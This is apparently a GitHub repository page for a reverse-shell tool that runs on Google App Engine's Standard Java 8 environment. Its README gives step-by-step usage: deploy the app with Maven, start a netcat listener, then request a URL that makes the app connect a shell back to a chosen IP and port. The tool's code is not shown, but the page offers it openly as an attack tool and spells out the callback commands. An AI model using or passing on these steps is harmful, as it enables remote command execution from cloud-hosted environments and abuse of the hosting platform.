Skip to content

Google App Engine reverse shell (Standard Java 8 environment)

Notifications You must be signed in to change notification settings

ezequielpereira/gae-reverse-shell

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
 
 
 
 
 
 

Repository files navigation

GAE Reverse Shell

Google App Engine reverse shell (Standard Java 8 environment)

Deploy:

mvn appengine:deploy

Run in terminal:

nc -lv <PORT>

Open in browser:

http://<APP>.appspot.com/shell?addr=<IP>&port=<PORT>

BusyBox license

BusyBox source-code used

About

Google App Engine reverse shell (Standard Java 8 environment)

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages